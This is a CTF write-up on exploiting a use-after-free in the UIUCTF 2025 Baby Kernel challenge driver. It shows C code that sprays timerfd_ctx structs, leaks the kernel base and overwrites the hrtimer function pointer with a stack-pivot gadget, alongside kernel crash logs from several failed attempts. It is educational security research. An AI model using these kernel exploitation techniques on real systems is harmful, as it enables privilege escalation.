Utkar5hM
2025/08/05

Kernel Exploitation Pitfalls #2: timerfd_ctx | UIUCTF 2025

This is a continuation of the Kernel Exploitation Pitfalls #1 blog, so I recommend reading that first. I’ll be using the same Baby Kernel challenge from UIUCTF 2025.

Now, I could’ve gone ahead and used the modprobe_path technique discussed by h0mbre, with a more detailed write-up by lkmidas. It looks way simpler and more direct. But before going down that route, I wanted to try something similar to my first approach, only this time using a different structure.

While going through this great reference on kernel exploitation structs, timerfd_ctx immediately stood out. It looked promising because we could potentially use it to control the instruction pointer (RIP), leak the kernel base address, and maybe even leak the heap.

Interestingly, there are a couple of writeups that use timerfd_ctx for the HotRod challenge, so it’s clearly viable. But I wanted to do it unassisted. Even though it seemed straightforward at first (lol), there were some surprisingly interesting observations that came up and definitely needed documenting. And oh, we failed in this blog as well.


Approach #2

Let’s first take a look at the structure we’ll be working with.

timerfd_ctx

The timerfd_ctx structure can be backed by either an hrtimer or an alarm. For this exploration, I chose to go with the hrtimer path, since it results in the kernel eventually calling the hrtimer_restart function after a specified interval.

This function takes a pointer to an hrtimer as its argument, and if our assumption is correct, that should point back to the same hrtimer inside our timerfd_ctx. Conveniently, hrtimer is the first field in the timerfd_ctx struct, which means control flow will begin at the very start of our object.

That opens up an opportunity. If the kernel ends up jumping into hrtimer_restart, and we control the timerfd_ctx layout in memory, it could serve as a pivot into our ROP chain, effectively treating timerfd_ctx as our fake stack.

At this point, both RDI and R14 should point to the timerfd_ctx, which makes it an ideal candidate for stack pivoting.

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	/* to show in fdinfo */
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};

allocating a timerfd_ctx struct

We can use the commands below to create an hrtimer with a specified timeout.

int timerfd=0;
timerfd = timerfd_create(CLOCK_MONOTONIC, 0);

//arming the timer
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_nsec = 100000; // 100μs
// timer_spec.it_value.tv_sec = 0; // 0 seconds
timerfd_settime(timer_fd, 0, &timer_spec, NULL);

executing hrtimer_restart function

Waiting for the specified amount of time should be enough to trigger it.

How do we exploit this?

This looks much simpler compared to the previous method.

  1. Allocate and free heap memory using our vulnerable driver.
  2. Spray timerfd_ctx structs into the freed heap and leak the kernel base to calculate gadget addresses.
  3. Place a ROP gadget where hrtimer_restart is expected, so that it pivots RSP to RDI.
  4. Place the actual ROP chain at the start of the timerfd_ctx.

Exploitation

Try #1

1. Allocate and free our heap through the vulnerable driver.

int vuln_fd = open("/dev/vuln", O_RDWR);
if(ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
  perror("ALLOC failed");
  return -1;
}
if (ioctl(vuln_fd, FREE) != 0) {
      perror("FREE failed");
      return -1;
  }

2. Allocate a timerfd_ctx in our freed heap and leak base addresses.

Let’s spray a bunch of timerfd_ctx structs to improve our chances.

char *uaf_buf = malloc(alloc_size);
printf("uaf_buf: %p\n", uaf_buf);
wait_for_enter(); // just a function waiting for me to press enter.
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_sec = 10; // 10 seconds
for (; spray_count < 1; spray_count++) {
	timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for(int i = 0; i < spray_count; i++) {
  timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}

// Read through our heap
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
    perror("USE_READ failed");
    free(uaf_buf);
}

uint64_t *leak = (uint64_t*)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
printf("base_address: 0x%lx\n", base_kernel_address);

We get the following output, and the base_address is successfully leaked. This can be confirmed using a SUID binary.

./exploit
uaf_buf: 0x22f1840
base_address: 0xffffffffaf000000

place a ROP gadget at hrtimer_restart’s place to point RSP to (RDI/R14).

First, let’s confirm whether we can control RIP by setting it to 0xdeadbeefdeadbe00 using the following code:

leak[5] = 0xdeadbeefdeadbe00ULL;
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

./exploit
uaf_buf: 0x772840
base_address: 0xffffffff8a000000
[+] Press Enter to continue
[    2.531059] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[   12.511589] general protection fault: 0000 [#1] PREEMPT SMP NOPTI
[   12.512248] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[   12.512594] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[   12.513402] RIP: 0010:0xdeadbeefdeadbe00
[   12.514261] Code: Unable to access opcode bytes at 0xdeadbeefdeadbdd6.
[   12.514569] RSP: 0018:ff54d2c6c0003f28 EFLAGS: 00010082
[   12.514889] RAX: ff2427c7c761f701 RBX: deadbeefdeadbe00 RCX: 0000000000000001
[   12.515165] RDX: 0000000000000000 RSI: 0000000000000006 RDI: ff2427c7c1bf5800
[   12.515430] RBP: ff2427c7c761f1c0 R08: ff2427c7c761f220 R09: 0000000000000000
[   12.515669] R10: 0000000000000000 R11: ff54d2c6c0003ff8 R12: 0000000000000006
[   12.515948] R13: ff2427c7c761f220 R14: ff2427c7c1bf5800 R15: ff2427c7c761f200
[   12.516243] FS:  0000000000000000(0000) GS:ff2427c7c7600000(0000) knlGS:0000000000000000
[   12.516524] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   12.516708] CR2: deadbeefdeadbe00 CR3: 0000000001c10000 CR4: 0000000000751ef0
[   12.517032] PKRU: 55555554
[   12.517227] Call Trace:
[   12.517952]  <IRQ>
[   12.518263]  ? die_addr+0x31/0x80
[   12.518537]  ? exc_general_protection+0x1af/0x3d0
[   12.518753]  ? check_preempt_curr+0x32/0x70
[   12.518924]  ? asm_exc_general_protection+0x26/0x30
[   12.519156]  ? __hrtimer_run_queues+0x10d/0x2a0
[   12.519324]  ? hrtimer_interrupt+0xf3/0x230
[   12.519464]  ? __sysvec_apic_timer_interrupt+0x4b/0x140
[   12.519698]  ? sysvec_apic_timer_interrupt+0x65/0x80
[   12.519993]  </IRQ>
[   12.520146]  <TASK>

As we can see, the kernel indeed crashes with our RIP value, which means the ROP chain can be placed at timerfd_ctx[0], while the stack pivot gadget can sit at timerfd_ctx[5].

This time, I was able to find a working stack pivot gadget:

// 0xffffffff81241107 : push rdi ; pop rsp ; xor eax, eax ; test edx, edx ; jle 0xffffffff81241114 ; jmp 0xffffffff81eafa50
// That jump leads to ret :D 

Let’s test if we can successfully pivot to a ROP chain.

leak[0] = 0xdeadbeefdeadbe00ULL;
leak[5] = base_kernel_address + gadget1; // Overwrite with gadget address

if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

[+] Press Enter to continue
[    2.655822] tsc: Refined TSC clocksource calibration: 3193.917 MHz
[    2.656770] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2e09d7b4b0a, max_idle_ns: 440795227609 ns
[    2.657417] clocksource: Switched to clocksource tsc
[    2.680992] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    3.607364] kernel tried to execute NX-protected page - exploit attempt? (uid: 0)
[    3.607849] BUG: unable to handle page fault for address: ff35f6d141c05500
[    3.608281] #PF: supervisor instruction fetch in kernel mode
[    3.608569] #PF: error_code(0x0011) - permissions violation
[    3.609039] PGD 6801067 P4D 6802067 PUD 6803067 PMD 1c1f063 PTE 8000000001c05163
[    3.609723] Oops: 0011 [#1] PREEMPT SMP NOPTI
[    3.610151] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    3.610453] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    3.610936] RIP: 0010:0xff35f6d141c05500
[    3.611523] Code: ff ff 00 55 c0 41 d1 f6 35 ff 10 00 00 00 00 00 00 00 46 00 01 00 00 00 00 00 08 55 c0 41 d1 f6 35 ff 18 00 00 00 00 00 00 00 <00> 55 c0 41 d1 f6 35 ff 10 f7 61 47 d1 f6 35 ff 00 00 00 00 00 00
[    3.612247] RSP: 0018:ff35f6d141c05508 EFLAGS: 00010046
[    3.612469] RAX: 0000000000000000 RBX: ffffffff83441107 RCX: 0000000000000001
[    3.612746] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ff35f6d141c05500
[    3.612993] RBP: ff35f6d14761f1c0 R08: ff35f6d14761f220 R09: 0000000000000000
[    3.613258] R10: 0000000000000000 R11: ff7a6da980003ff8 R12: 0000000000000002
[    3.613540] R13: ff35f6d14761f220 R14: ff35f6d141c05500 R15: ff35f6d14761f200
[    3.613933] FS:  0000000000000000(0000) GS:ff35f6d147600000(0000) knlGS:0000000000000000

Interesting, instead of seeing 0xdeadbeefdeadbe00 at RIP, we get 0xff35f6d141c05500, which matches the value of RDI. If you debug this in GDB, you’ll notice that the value changes once the struct is allocated.

After cleaning up the code a bit and running it again, I ended up hitting the following error:

[+] Press Enter to continue
[    4.251144] general protection fault, probably for non-canonical address 0xdeadbeefdeadbe08: 0000 [#1] PREEMPT SMP NOPTI
[    4.251823] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    4.252121] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    4.252580] RIP: 0010:rb_insert_color+0x18/0x140
[    4.253106] Code: 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 07 48 85 c0 0f 84 ba 00 00 00 48 8b 10 f6 c2 01 75 59 <48> 8b 4a 08 48 39 c1 74 $                                                                                                                                           55 48 85 c9 74 05 f6 01 01 74 7c 48 8b 48
[    4.253868] RSP: 0018:ffffffffaa003dc0 EFLAGS: 00010046
[    4.254132] RAX: ff1ae31b01c03f00 RBX: ff1ae31b04e1f710 RCX: ff1ae31b01c03f10
[    4.254420] RDX: deadbeefdeadbe00 RSI: ff1ae31b04e1f220 RDI: ff1ae31b04e1f710
[    4.254695] RBP: 0000000000000000 R08: ff1ae31b04e1f220 R09: 0000000000018001
[    4.254963] R10: 0000000000000000 R11: 0000000000000007 R12: 0000000000018001
[    4.255255] R13: 00000001125c34c0 R14: ff1ae31b04e1f200 R15: 000000000001f1c0
[    4.255594] FS:  0000000000000000(0000) GS:ff1ae31b04e00000(0000) knlGS:0000000000000000
[    4.255956] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.256182] CR2: deadbeefdeadbe08 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    4.256516] PKRU: 55555554
[    4.256709] Call Trace:
[    4.257587]  <TASK>
[    4.257944]  ? die_addr+0x31/0x80
[    4.258135]  ? exc_general_protection+0x1af/0x3d0
[    4.258380]  ? asm_exc_general_protection+0x26/0x30
[    4.258616]  ? rb_insert_color+0x18/0x140
[    4.258768]  timerqueue_add+0x66/0xb0
[    4.258968]  enqueue_hrtimer+0x2a/0x80
[    4.259107]  hrtimer_start_range_ns+0xf5/0x350
[    4.259288]  ? get_next_timer_interrupt+0x7a/0x110
[    4.259442]  tick_nohz_idle_stop_tick+0x233/0x2a0
[    4.259597]  ? sched_clock+0x10/0x30
[    4.259747]  do_idle+0x1d4/0x220
[    4.259857]  cpu_startup_entry+0x25/0x30
[    4.259972]  rest_init+0xc0/0xc0
[    4.260083]  arch_call_rest_init+0x9/0x30
[    4.260294]  start_kernel+0x414/0x670
[    4.260459]  x86_64_start_reservations+0x18/0x30
[    4.260670]  x86_64_start_kernel+0xc5/0xd0
[    4.260817]  secondary_startup_64_no_verify+0x178/0x17b
[    4.261075]  </TASK>

It appears the crash occurs inside the rb_insert_color function, which is responsible for inserting a node into a red-black tree.

Let’s take a closer look at the hrtimer structure:

struct rb_node {
	unsigned long  __rb_parent_color;
	struct rb_node *rb_right;
	struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

struct timerqueue_node {
	struct rb_node node;
	ktime_t expires;
};

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

Reviewing the kernel source reveals the following:

SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
	struct timerfd_ctx *ctx;
  // some other stuff
	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
  // some other stuff
  hrtimer_init(&ctx->t.tmr, clockid, HRTIMER_MODE_ABS);
}

static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
			   enum hrtimer_mode mode)
{
	timerqueue_init(&timer->node);
}

static inline void timerqueue_init(struct timerqueue_node *node)
{
	RB_CLEAR_NODE(&node->node);
}


#define RB_CLEAR_NODE(node)  \
	((node)->__rb_parent_color = (unsigned long)(node))

We can observe that the node field is initialized to point to itself when we call timerfd_create(). But what about rb_insert_color?

SYSCALL_DEFINE4(timerfd_settime, int, ufd, int, flags,
		const struct __kernel_itimerspec __user *, utmr,
		struct __kernel_itimerspec __user *, otmr)
{
	ret = do_timerfd_settime(ufd, flags, &new, &old);
}


static int do_timerfd_settime(int ufd, int flags, 
		const struct itimerspec64 *new,
		struct itimerspec64 *old)
{ 
	struct timerfd_ctx *ctx;
	ret = timerfd_setup(ctx, flags, new);
}
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
			 const struct itimerspec64 *ktmr)
{
      //somewhere
			hrtimer_start(&ctx->t.tmr, texp, htmode);
}

static inline void hrtimer_start(struct hrtimer *timer, ktime_t tim,
				 const enum hrtimer_mode mode)
{
	hrtimer_start_range_ns(timer, tim, 0, mode);
}

static int __hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
				    u64 delta_ns, const enum hrtimer_mode mode,
				    struct hrtimer_clock_base *base)
{
  // lot of stuff
	first = enqueue_hrtimer(timer, new_base, mode);
  // lot of stuff
}
static int enqueue_hrtimer(struct hrtimer *timer,
			   struct hrtimer_clock_base *base,
			   enum hrtimer_mode mode)
{

	return timerqueue_add(&base->active, &timer->node);
}

/**
 * timerqueue_add - Adds timer to timerqueue.
 *
 * @head: head of timerqueue
 * @node: timer node to be added
 *
 * Adds the timer node to the timerqueue, sorted by the node's expires
 * value. Returns true if the newly added timer is the first expiring timer in
 * the queue.
 */
bool timerqueue_add(struct timerqueue_head *head, struct timerqueue_node *node)
{
	/* Make sure we don't add nodes that are already added */
	WARN_ON_ONCE(!RB_EMPTY_NODE(&node->node));

	return rb_add_cached(&node->node, &head->rb_root, __timerqueue_less);
}


/**
 * rb_add_cached() - insert @node into the leftmost cached tree @tree
 * @node: node to insert
 * @tree: leftmost cached tree to insert @node into
 * @less: operator defining the (partial) node order
 *
 * Returns @node when it is the new leftmost, or NULL.
 */
static __always_inline struct rb_node *
rb_add_cached(struct rb_node *node, struct rb_root_cached *tree,
	      bool (*less)(struct rb_node *, const struct rb_node *))
{
	struct rb_node **link = &tree->rb_root.rb_node;
	struct rb_node *parent = NULL;
	bool leftmost = true;

	while (*link) {
		parent = *link;
		if (less(node, parent)) {
			link = &parent->rb_left;
		} else {
			link = &parent->rb_right;
			leftmost = false;
		}
	}

	rb_link_node(node, parent, link);
	rb_insert_color_cached(node, tree, leftmost);

	return leftmost ? node : NULL;
}

static inline void rb_insert_color_cached(struct rb_node *node,
					  struct rb_root_cached *root,
					  bool leftmost)
{
	if (leftmost)
		root->rb_leftmost = node;
	rb_insert_color(node, &root->rb_root);
}

While diving deeper into this may not yield direct value for exploitation, it’s clear that the kernel uses red-black trees to manage timers. Specifically, the first 8 bytes of timerfd_ctx are overwritten as part of this setup, pointing to the same structure. This modification is triggered internally when a timer is armed using timerfd_settime().

Try #2

Now that the modification is known to occur after a short delay, we can introduce a brief pause before overwriting timerfd_ctx[0], with the goal of racing the kernel’s logic and gaining control over the structure in time.

usleep(20); // 100μs
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

[+] Press Enter to continue
[    2.592776] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    2.976739] general protection fault, probably for non-canonical address 0xf608c383480b8b58: 0000 [#1] PREEMPT SMP NOPTI
[    2.977266] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    2.977491] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    2.977819] RIP: 0010:rb_next+0x18/0x50
[    2.978216] Code: 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 0f 48 39 cf 74 33 48 8b 57 08 48 85 d2 74 1d 48 89 d0 <48> 8b 52 10 48 85 d2 75 f4 c3 cc cc cc cc 48 3b 78 08 75 15$                                                                                                         48 8b
[    2.978730] RSP: 0018:ff6627f000003f10 EFLAGS: 00010086
[    2.978881] RAX: f608c383480b8b48 RBX: ff13089641987128 RCX: 0000000000000001
[    2.979044] RDX: f608c383480b8b48 RSI: ff13089641987128 RDI: ff13089641987128
[    2.979224] RBP: ff1308964761f220 R08: 0000000000000004 R09: 0000000000000000
[    2.979392] R10: 0000000000000000 R11: ff6627f000003ff8 R12: 0000000000000006
[    2.979579] R13: ff1308964761f220 R14: ff13089641987128 R15: ff1308964761f200
[    2.979767] FS:  0000000000000000(0000) GS:ff13089647600000(0000) knlGS:0000000000000000
[    2.979966] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.980109] CR2: f608c383480b8b58 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    2.980321] PKRU: 55555554
[    2.980465] Call Trace:
[    2.981147]  <IRQ>
[    2.981390]  ? die_addr+0x31/0x80
[    2.981515]  ? exc_general_protection+0x1af/0x3d0
[    2.981630]  ? asm_exc_general_protection+0x26/0x30
[    2.981765]  ? rb_next+0x18/0x50
[    2.981850]  timerqueue_del+0x1f/0x50
[    2.981984]  __hrtimer_run_queues+0xdf/0x2a0
[    2.982105]  hrtimer_interrupt+0xf3/0x230
[    2.982219]  __sysvec_apic_timer_interrupt+0x4b/0x140
[    2.982339]  sysvec_apic_timer_interrupt+0x65/0x80
[    2.982561]  </IRQ>
[    2.982624]  <TASK>
[    2.982671]  asm_sysvec_apic_timer_interrupt+0x1a/0x20
[    2.982897] RIP: 0010:default_idle+0xf/0x20

Now, rb_next() gets called, probably one of the other functions trying to keep the red-black tree up to date, and there could be more.

Try #3

We can try to rewrite the heap just before the timer is about to expire so that no functions running in the middle are interrupted. We get the following output:

./exploit
uaf_buf: 0x688840
base_address: 0xffffffff81800000
[    2.531285] BUG: kernel NULL pointer dereference, address: 0000000000000000
[    2.531656] #PF: supervisor write access in kernel mode
[    2.531821] #PF: error_code(0x0002) - not-present page
[    2.531982] PGD 1c02067 P4D 1c18067 PUD 1c2b067 PMD 0 
[    2.532274] Oops: 0002 [#1] PREEMPT SMP NOPTI
[    2.532515] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1

[    2.533046] RIP: 0010:rb_erase+0x18b/0x3a0
[    2.533398] Code: 48 83 c0 01 48 89 01 c3 cc cc cc cc c3 cc cc cc cc 48 89 46 10 e9 17 ff ff ff 48 8b 56 10 48 8d 41 01 48 89 51 08 48 89 4e 10 <48> 89 02 48 8b 01 48 89 06 48 89 31 48 83 f8 03 0$                                                                                                                  f 86 96 00 00 00
[    2.533843] RSP: 0018:ff48cf3480003f10 EFLAGS: 00010046
[    2.533986] RAX: ff1fe4150198b129 RBX: ff1fe4150761f710 RCX: ff1fe4150198b128
[    2.534140] RDX: 0000000000000000 RSI: ff1fe41501c06500 RDI: ff1fe4150761f710
[    2.534307] RBP: ff1fe4150761f220 R08: ff1fe4150761f220 R09: ff1fe41501bb9790
[    2.534479] R10: ff1fe4150762b580 R11: ff48cf3480003ff8 R12: 0000000000000002
[    2.534649] R13: ff1fe4150761f220 R14: ff1fe4150761f710 R15: ff1fe4150761f200
[    2.534964] FS:  0000000000000000(0000) GS:ff1fe41507600000(0000) knlGS:0000000000000000
[    2.535235] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.535412] CR2: 0000000000000000 CR3: 0000000001c12000 CR4: 0000000000751ef0
[    2.535663] PKRU: 55555554
[    2.535804] Call Trace:
[    2.536553]  <IRQ>
[    2.536884]  ? __die+0x1e/0x60
[    2.537021]  ? page_fault_oops+0x17c/0x470
[    2.537131]  ? exc_page_fault+0x6b/0x150
[    2.537278]  ? asm_exc_page_fault+0x26/0x30
[    2.537437]  ? rb_erase+0x18b/0x3a0
[    2.537543]  timerqueue_del+0x2e/0x50
[    2.537695]  __hrtimer_run_queues+0xdf/0x2a0
[    2.537826]  hrtimer_interrupt+0xf3/0x230
[    2.537947]  __sysvec_apic_timer_interrupt+0x4b/0x140
[    2.538082]  sysvec_apic_timer_interrupt+0x65/0x80
[    2.538290]  </IRQ>
[    2.538350]  <TASK>

Digging deep again, I came across this:

static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
			  struct hrtimer_clock_base *base,
			  struct hrtimer *timer, ktime_t *now,
			  unsigned long flags) __must_hold(&cpu_base->lock)
{

	enum hrtimer_restart (*fn)(struct hrtimer *);
  // between bazillion other stuff
	__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);

	fn = timer->function;
	restart = fn(timer);
}

static void __remove_hrtimer(struct hrtimer *timer,
			     struct hrtimer_clock_base *base,
			     u8 newstate, int reprogram)
{
  // between bazillion other stuff
	if (!timerqueue_del(&base->active, &timer->node)) {
    // does something
  }
}

bool timerqueue_del(struct timerqueue_head *head, struct timerqueue_node *node)
{
	WARN_ON_ONCE(RB_EMPTY_NODE(&node->node));

	rb_erase_cached(&node->node, &head->rb_root);

	return !RB_EMPTY_ROOT(&head->rb_root.rb_root);
}
static inline struct rb_node *
rb_erase_cached(struct rb_node *node, struct rb_root_cached *root)
{
  //other stuff 
	rb_erase(node, &root->rb_root);
}

The function that is responsible for calling the hrtimer_restart function first calls the function that ends up calling rb_erase.

At this point, there are several approaches that I could think about:

  1. Find a Return-Oriented Programming (ROP) gadget that pivots RSP to timerfd_ctx + some_offset.

  2. Race conditions? Somehow change timerfd_ctx[0] just after rb_erase has returned and hrtimer_restart has to be called?

I do not yet understand race conditions enough in this context to even know if it’s possible. At this point, I went through D3vil’s writeup for HotRod. Interestingly, he sets timerfd_ctx[0] to &timerfd_ctx[0] + some_offset and then sets the value stored at RDI to ESP, and that doesn’t seem to crash the kernel. Keep in mind that Supervisor Mode Access Prevention (SMAP) is disabled in that challenge, so 32 bits was enough in that case. The writeup also goes over the usage of userfaultfd for exploiting race conditions reliably, but it seems to have been deprecated and we need to look into Filesystem in Userspace (FUSE) for it. Maybe something I can have a look at next.

This means that the timer argument passed to __run_hrtimer below is taken from timerfd_ctx[0].

static void __hrtimer_run_queues(struct hrtimer_cpu_base *cpu_base, ktime_t now,
				 unsigned long flags, unsigned int active_mask)
{
	struct hrtimer_clock_base *base;
	unsigned int active = cpu_base->active_bases & active_mask;

	for_each_active_base(base, cpu_base, active) {
		struct timerqueue_node *node;
		ktime_t basenow;

		basenow = ktime_add(now, base->offset);

		while ((node = timerqueue_getnext(&base->active))) {
			struct hrtimer *timer;

			timer = container_of(node, struct hrtimer, node);

			/*
			 * The immediate goal for using the softexpires is
			 * minimizing wakeups, not running timers at the
			 * earliest interrupt after their soft expiration.
			 * This allows us to avoid using a Priority Search
			 * Tree, which can answer a stabbing query for
			 * overlapping intervals and instead use the simple
			 * BST we already have.
			 * We don't add extra wakeups by delaying timers that
			 * are right-of a not yet expired timer, because that
			 * timer will have to trigger a wakeup anyway.
			 */
			if (basenow < hrtimer_get_softexpires_tv64(timer))
				break;

			__run_hrtimer(cpu_base, base, timer, &basenow, flags);
			if (active_mask == HRTIMER_ACTIVE_SOFT)
				hrtimer_sync_wait_running(cpu_base, flags);
		}
	}
}

Try #4

Well, we can try to see in the source code if that’s what happens, but (skill issue) we can test this. Let’s set timerfd_ctx[0] to &timerfd_ctx[0]+100. This should give us a page fault for trying to execute &timerfd_ctx[0]+100 at RIP with our current ROP gadget.

./exploit
uaf_buf: 0x19cd840
base_address: 0xffffffff9bc00000
timerfd_tmrproc: 0xffffffff9bee6a20
gadget1: 0xffffffff9be41107
previous_buf: 0x1
[    2.558530] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    2.560838] BUG: kernel NULL pointer dereference, address: 0000000000000074
[    2.561136] #PF: supervisor read access in kernel mode
[    2.561279] #PF: error_code(0x0000) - not-present page
[    2.561463] PGD 1c04067 P4D 1bfd067 PUD 1c18067 PMD 0 

[    2.562034] CPU: 0 PID: 65 Comm: exploit Tainted: G           O       6.6.16 #1
[    2.562239] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    2.562550] RIP: 0010:rb_erase+0x84/0x3a0
[    2.562947] Code: 89 16 48 8b 57 10 48 89 50 10 48 8b 32 83 e6 01 4c 01 d6 48 89 32 48 8b 17 48 83 fa 03 0f 86 82 00 00 00 48 89 d6 48 83 e6 fc <48> 3b 7e 10 0f 84 e4 00 00 00 48 89 $                                                                                                                               46 08 4d 85 c9 74 0f 48 83 c1
[    2.563416] RSP: 0018:ff623b9d00003f10 EFLAGS: 00010002
[    2.563559] RAX: ff17ea7401987128 RBX: ff17ea7401bf4d00 RCX: ff17ea7401987128
[    2.563795] RDX: 0000000000000065 RSI: 0000000000000064 RDI: ff17ea7401bf4d00
[    2.563975] RBP: ff17ea740761f220 R08: ff17ea740761f220 R09: 0000000000000000
[    2.564142] R10: ff17ea7401987128 R11: ff623b9d00003ff8 R12: 0000000000000006
[    2.564308] R13: ff17ea740761f220 R14: ff17ea7401bf4d00 R15: ff17ea740761f200
[    2.564524] FS:  00000000019cc3c0(0000) GS:ff17ea7407600000(0000) knlGS:0000000000000000
[    2.564799] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.564986] CR2: 0000000000000074 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    2.565247] PKRU: 55555554
[    2.565386] Call Trace:
[    2.566143]  <IRQ>
[    2.566406]  ? __die+0x1e/0x60
[    2.566549]  ? page_fault_oops+0x17c/0x470
[    2.566697]  ? exc_page_fault+0x6b/0x150
[    2.566782]  ? asm_exc_page_fault+0x26/0x30
[    2.566895]  ? rb_erase+0x84/0x3a0
[    2.566989]  timerqueue_del+0x2e/0x50
[    2.567120]  __hrtimer_run_queues+0xdf/0x2a0

This does not seem to happen, but interestingly we do get a page fault which the userfaultfd, so does it end up handling in this situation as well? I have really no clue currently and need to dig further.

I still tried to do something different, just to replicate it like the above writeup. Get the leak from the first timer, deallocate it by using close(timer_fd), then try to get another timerfd_ctx allocated. But no matter how hard I tried, the second timerfd_ctx never got allocated into my freed heap with the below code, leading to 0xdeadbeefdeadbe00 never being called.

int vuln_fd = open("/dev/vuln", O_RDWR);
    char *uaf_buf = malloc(alloc_size); //assume not failed
    char *uaf_buf2 = malloc(alloc_size);//assume not failed
	memset(uaf_buf2, 0, alloc_size);
	
	
	struct itimerspec timer_spec = {{0, 0}, {10, 0}};
	int timer_fd, timer_fds[20];
	int spray_count = 0;

	if(ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
		//assume not failed to reduce text
	}
	if (ioctl(vuln_fd, FREE) != 0) {
		//assume not failed to reduce text
    }

	//allocation 1
	timer_fd = timerfd_create(CLOCK_REALTIME, 0);
	timerfd_settime(timer_fd, 0, &timer_spec, 0);
    close(timer_fd);
	sleep(1);

	if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
        perror("USE_READ failed");
        free(uaf_buf);
    }

	// allocation 2
	for (; spray_count < 20; spray_count++) {
		timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
	}
	for(int i = 0; i < spray_count; i++) {
		timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
	}
	sleep(1);

	
	uint64_t *leak = (uint64_t*)uaf_buf;
	uint64_t timerfd_tmrproc = leak[5];
	base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
	leak[5] = 0xdeadbeefdeadbe00; // Overwrite with gadget address
	if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
		printf("USE_WRITE failed\n");
		goto cleanup;
	}
	wait_for_enter();

However, if you go over Will’s Root’s HotRod writeup, he uses xchg_eax_esp for a stack pivot, something I really did not understand. Where and how is he controlling $eax?

Looking at the register values when our target function is called, $rax seems to possibly hold a pointer to the heap but where????

Breakpoint 2, 0xffffffff88e41107 in ?? ()
(gdb) i r
rax            0xff19fc968761f701  -64742996173523199
rbx            0xffffffff88e41107  -1998319353
rcx            0x1                 1
rdx            0x0                 0
rsi            0x2                 2
rdi            0xff19fc9681c02900  -64742996268013312
rbp            0xff19fc968761f1c0  0xff19fc968761f1c0
rsp            0xff4ea116c0003f28  0xff4ea116c0003f28
r8             0xff19fc968761f220  -64742996173524448
r9             0x0                 0
r10            0x0                 0
